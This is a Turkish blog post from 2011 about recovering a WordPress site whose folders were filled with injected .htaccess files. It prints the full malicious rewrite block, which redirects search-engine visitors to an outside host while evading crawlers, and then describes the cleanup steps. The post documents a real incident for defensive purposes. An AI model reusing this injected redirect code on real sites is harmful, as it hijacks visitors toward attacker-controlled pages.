“exgocgkctswo” .htaccess Hack ve Kurtulma Yolları
Evet bir kaç gündür bloguma ulaşmak isteyipte ulaşamayan arkadaşlar farketmiş olacaktır. İlk iki gün 503 hatası alınca server bazlı bir sorun olduğunu düşünerek hosting firmama ticket açtım ve bir süre cevap bekleyerek geçti ki gelen cevapta server konfigrasyonlarında bir sorunun olmadığı tema yada kurulu olan wordpress ile ilgili sorun olduğu konusunda bir geri dönüş olunca zamanın da darlığı ile öncelikle başladım ftp de dolaşmaya.
Birden farkettim ki abartısız her klasörün içinde var olan bir .htaccess dosyası var merak ettim ve içeriğine baktığımda da agent’ları hedef alan ve sonrasında siteyi yoran bir kod bloğuyla karşılaştım.
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http)([^].)(google.yahoo.bing.msn.yandex.ask.excite.altavista.netscape.aol.hotbot.goto.infoseek.mamma.alltheweb.lycos.search.metacrawler.rambler.mail.dogpile.ya.search).$ [NC]
RewriteCond %{HTTP_REFERER} !^.(q=cache).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(bingAccoonaAcesExplorerAmfibiAmigasOSapacheappieAppleSyndication).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ArchiveArgusAsksJeevesasteriasAtrenkosNewsBeOSBigBlogZoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(BookmarkbotCE-PreloadCFNetworkcococCombineCrawlcurlDangershiptop).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(DiagnosticsDTAAgentectoEmeraldShieldendoEvaalEverest-Vulcan).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(exactseekFeedFetchfindlinksFreeBSDFriendsterFucksYouGoogle).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(GregariusHatenaScreenshotheritrixHolyCowDudeHonda-SearchHP-UX).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurfLinuxLiveJournalLonoponoLotus-NotesLycosLynxMac_PowerPC).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Mac_PPCMacs10MacsOSmacDNMacintoshMediapartnersMegiteMetaProducts).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(os=MacP900ipanscientperlPlayStationPOE-ComponentPrivacyFinder).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeriess60).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SharpReaderSiteBarSlurpSnoopySoapsClientSocialmarksSpheresScout).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWins9x).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Win16Win95Win98Windowss95Windowss98WindowssCEWindowssNTs4).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(YandexYetiYouReadMeZhuaxiaZyBorg).$ [NC]
RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.)$ httptrialworld.netcgi-binr.cgip=10003&i=604add41&j=327&m=e8d794e1972216960f0b996ffedc1a32&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe1%{HTTP_HOST}100800HttpOnly]
# exgocgkctswo
Bu durumdan kurtulmak için öncelikle ftp’deki dosyalarımın tümünü bilgisayarıma indirdim. içinde yaklaşık 300′e yakın olan .htaccess dosyalarını temizledim bu arada bu noktada dikkat etmek gerekiyor .htaccess kullanan bir eklenti kullanıyor iseniz onuda silme ihtimalinize karşı öncelikle daha önce elinizde sağlam bir şekilde var olan bir yedeğinizin olması sizi olası sorunlardan koruyacaktır. Sonrasında ise wordpress’in kendi root dizinindeki .htaccess’de dahil olmak üzere tümünü kaldırdığınızdan emin iseniz FTP’deki dosyaları silerek bunları tekrar atmalısınız. Bu işlem bittiğinde aşağıdaki resimde de görüldüğü gibi sitenizi ilginç karakterlerle açılıyor görebilirsiniz. Endişelenmeyin.
Bu aşamada aklıma gelen ilk şey acaba wordpress’in dosyalarında da mı bir sıkıntı var diyerek temiz en son sürümü indirip dosyalarını tekrar ftp attım ama nafile. Birden Admin panelindeki Ayarlar menüsünde var olan “Kalıcı bağlantılar” ile .htaccess oluşturmak geldi aklımdan ve sorunda hallolmuş oldu böylece :) Bu arada Kalıcı bağlantılar menüsü altında ayarlarınızı resimdeki gibi yapmanız gerekmektedir.
Böylece bir kaç günlük aranın ardından daha sağlıklı bir şekilde kaldığımız yerden devam ediyoruz.
| Print article | This entry was posted by Serkan on 1 Mayıs 2011 at 12:49, and is filed under Güvenlik, Nasıl yapılır. Follow any responses to this post through RSS 2.0. Yorum veya kendi sitenizden geribildirim yapabilirsiniz. |
Henüz geribildirim yok
Backtrack 5 Yayınlandı!
yaklaşık 1 yıl önce - 4 yorum
Güvenlik testleri için özel olarak üretilen Linux dağıtımı olan Backtrack’ın yeni sürümü dün itibari ile yayınlandı. BackTrack 5 olarak piyasaya çıkan sürümün Ekran görüntüleri aşağıda yer almakta. Yeni sürümü indirmek için http://www.backtrack-linux.org/downloads/ linkini ziyaret etmeniz yeterli olacaktır.
Backtrack 4 Final Yayınlandı!
yaklaşık 2 yıl önce - 1 yorum
Malumunuz Güvenlik testleri ve Hacking için özel olarak tasarlanan ve çeşitli toolları içerisinde varsayılan olarak bulunduran bir Linux dağıtımı olan Backtrack Son sürümü 4′ü yayınladı. Ekran görüntüleri: Download için: http://www.backtrack-linux.org/downloads/ adresini ziyaret edebilrsiniz.
“Beni hackleyebilir misin?”
yaklaşık 2 yıl önce - 1 yorum
Uzun zamandır takip ettiğim ve Türkiye’de Network ve Güvenlik konularında başarılarını örnek aldığım kişi olan Huzeyfe Onal ve ekibinin IstSec ile geçen hafta güzel bir konferansa imza attıklarını duyurmuştum. Bir önceki yazımda… Bu hafta’da IstSec’in ikinci gününde yer alan ve Huzeyfe Önal tarafından geliştirilen sistem üzerinde bir yarışma gerçekleştirildi ama biraz da gizli kalmak isteyen…
Akbank’tan Phishing Uyarısı
yaklaşık 3 yıl önce - 2 yorum
Akbank’tan yapılan açıklamaya göre son günlerde Akbank ismi ve görseli kullanılarak dolandırıcılık (phishing) amaçlı mail yollanıldığı içeriğinde ise “Akbank Hesap Kartı Doğrulama” ya da “Bilgilerinizin yeni altyapımızda güncellenmesi için ‘Güncellemek için tıklayınız’ yazılı link aracılığıyla müşterilerin sahte Akbank web sitesine yönlendirilerek bu sayfada açılan ekran üzerinde de banka kartı numarası, son kullanma tarihi ve Akbank…
Kaspersky’dan sonra F-secure da hacklendi..
yaklaşık 3 yıl önce - Yorum yok
Bugün sabah yazdığım haberde Kaspersky Keylerinin siteninde hacklenerek alındığını belirtmiştim. Bugünün ikinci hack olayı ise bir diğer Anti-virüs ve güvenlik yazılım firması olan F-Secure’un resmi web sitesinin SQL Injection ve Cross Site Scripting ile MailboxInfo, VirusUpdated, dtproperties, Ülke, sysconstraints, VirusTrends, Virus_Top50_24h, Virus_Top50_30days, Virus_Top50_7days, Virus_Top50_90days, Virus_Top50_Month, Virus_Top50_Week, VirusDateTotal, VirusDate, VirusMonthTotal, VirusReports, VirusReportsTemp, VirusTrends. tablolarına elişildi.
Kaspersky aktivasyon kodları çalındı
yaklaşık 3 yıl önce - Yorum yok
Güvenlik yazılımları geliştiricisi Kaspersky’nin web sitesinde bulunan SQL açığından yararlanan bir hacker siteyi hack’ledi. Bir güvenlik yazılımları geliştiricisinin başına gelebilecek en tatsız olaylardan biri Rus güvenlik yazılımları geliştiricisi Kasperksy’nin başına geldi. Kaspersky’nin web sitesinde bulunan SQL açığını kullanan bir hacker Kaspersky’nin sitesini hack’ledi. Şirket tarafından da doğrulanan hack olayı sonrasında “Bu asla olmamalıydı” şeklinde açıklama …
Additional comments powered byBackType
yaklaşık 1 yıl önce
Sitemdeki sorun ve çözümü hakkında yazılmıştır :)
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
bu arada bulaşma yolları hakkında bir şey bulamadım bilgisi olan birileri varsa paylaşırsa sevinirim :)
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
Serkan, bulletproof security eklentisini kullanıyorum üstüne bir de tatlı olarak secure wordpress alıyorum :) Yine %100 güvenlik sağlamasa da en azından az biraz caydırıcı olabiliyor hacking attemp’ler karşısında.
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
secure wp bende de var bulletproof u hiç denemedim bir ara denemeliyim sanırım Taylan hocam
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
Kesinlikle dene bence özellikle bu .htaccess dosyalarını yedeklemede ve güvenlik içinde tutmakta sağlam iş görüyor.
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
http://ff.im/Cnjhm
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
kurdum şimdi ben de :D
This comment was originally posted on FriendFeed
yaklaşık 1 yıl önce
Bir kac gündür cektigim azabin caresi “exgocgkctswo”+.htaccess+Hack+ve+Kurtulma+Yolları http://t.co/VnQPJ6X aracılığıyla @serkancura
This comment was originally posted on Twitter